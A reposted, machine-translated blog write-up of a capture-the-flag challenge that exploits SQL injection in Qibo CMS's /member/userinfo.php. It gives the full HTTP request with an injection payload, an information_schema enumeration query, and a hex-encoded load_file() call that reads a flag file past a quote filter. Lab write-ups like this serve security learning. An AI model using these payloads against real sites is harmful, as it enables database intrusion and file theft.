Goodbye CMS

Others 2019-06-16 21:20:17 views: null
  • Search found to be the lowest Reserved Qi Bo cms
  • Qi Bo cms find loopholes. No matching various directories exist, found /member/userinfo.php SQL injection vulnerability may be effective.
  • http://www.anquan.us/static/bugs/wooyun-2014-080259.html this connection a detailed process
  • Turn to the last, according to loopholes in burpsuite payload structure
POST /member/userinfo.php?job=edit&step=2 HTTP/1.1
Host: 1224ac9227f345b59cb0131a09721df592d05799f2094c85.changame.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://1224ac9227f345b59cb0131a09721df592d05799f2094c85.changame.ichunqiu.com/member/homepage.php?uid=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 267
Connection: close
Cookie: USR=m56znlt5%0923%091559486775%09http%3A%2F%2F1224ac9227f345b59cb0131a09721df592d05799f2094c85.changame.ichunqiu.com%2Fmember%2Fhomepage.php%3Fuid%3D4; __jsluid=7d7f069fe967182647342ec73e505d82; passport=3%09admin1%09AwUEAFFQUQMBVwQGXlUBUV0DAA8OW1VVBQxUAgFaV1M%3D57f744ae5a
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

truename=xxxx%0000&Limitword[000]=&[email protected]&provinceid= , address=(select database() ) where uid = 3 %23
  • Note that the constructor vulnerability when asked certain things into their own registration.

  • And finally found success broke database blog.


    6922135-12f16e5b1619bb92.png
    Pictures .png
  • Continue with the construction of the contents of sql notes, but actually found the back of the filter, ' "and so on, plus the \ number.
  • Since the first database can burst, then the bypass is very simple ah.
  • Let = statement later replaced with a look on the line. E.g
select group_concat(table_name)  from information_schema.tables where table_schema=(select table_schema from information_schema.tables group by table_schema limit 1,1  )
  • Has been found in the end, I found no flag. Finally, look at the file wp found that injecting flag comes out with a look at the sql var / www / html / inside
  • I.e. select load_file ( '/ var / www / html / flag.php'), but as the 'filtered so use the ASCII HEX manner. select load_file (0x2f7661722f7777772f68746d6c2f666c61672e706870)
  • Because check out the php file instead of html file, will not display the page, so go see the source code.

  • Get flag
    6922135-2e3c763105a05f0b.png
    Pictures .png

Reproduced in: https: //www.jianshu.com/p/0ac84b411eb6

Guess you like

Origin blog.csdn.net/weixin_34357267/article/details/91214471
Recommended
Rushing to the GitHub hot list——How can open source programming languages and frameworks be so cute?
Beijing Humanoid Robot Innovation Center launches Tiangong, the world's first full-size humanoid robot with purely electric drive for anthropomorphic running
Ranking
8个无需编写代码即可使用 Python 内置库的方法
Java collections interview knowledge Lite
Machine learning algorithms foundation - Introduction a (watermelon materials for the book)
(Easy) Ransom Note - LeetCode
[Five days] Qt from entry to actual combat: the second day
Remember once extremely pit father can not download Maven Jar package of issues: IDEA question
The minimum cost Shortest
OSPF study map (the most complete version)
Network Takeaways
GnuPG
Daily
More
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)

Code World

© 2018 codetd.com